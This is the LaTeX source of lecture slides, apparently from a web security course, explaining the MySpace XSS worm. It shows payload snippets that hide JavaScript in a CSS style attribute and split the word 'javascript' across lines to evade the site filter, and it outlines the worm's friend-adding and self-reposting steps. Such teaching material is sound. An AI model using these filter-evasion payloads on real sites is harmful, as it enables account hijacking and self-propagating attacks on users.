\section{MySpace Worm}

\subsection{Injecting JavaScript}

	\begin{frame}\frametitle{\subsecname}

	MySpace blocks \texttt{<script>}, \texttt{<body>}, \ldots{} but not CSS, so JavaScript code can be placed in a \texttt{style} attribute.

	\begin{block}{Example}
		\texttt{<div style="background:url('javascript:alert(1)')">}
	\end{block}
	
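	The command is stored in a separate attribute (\texttt{expr}) so that quotes can be used inside it.
	The word \emph{javascript} is split across two lines, so the browser still reads it but the MySpace analyzer does not recognise it; the filter and the browser do not parse the input the same way.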

	\begin{block}{Example}
		\texttt{<div id="mycode" expr="alert('double quote: ' + String.fromCharCode(34))" style="background:url('java
script:eval(document.all.mycode.expr)')">}
	\end{block}

	\end{frame}

\subsection{Spreading}

	\begin{frame}\frametitle{\subsecname}

			\begin{enumerate}
				\item Get the current page path
				\item Obtain the security hash
				\item Add a friend in the network
				\item Post the same post on the viewer's profile
			\end{enumerate}

			The corresponding code or request for each step:

			\begin{enumerate}
				\item \texttt{alert(eval('document.body.inne' + 'rHTML'));}
				\item \texttt{AQ=getHiddenParameter(AU,'hashcode');}
				\item \texttt{fuseaction=invite.addFriendsProcess;}
				\item HTTP \texttt{POST} request
			\end{enumerate}
	\end{frame}



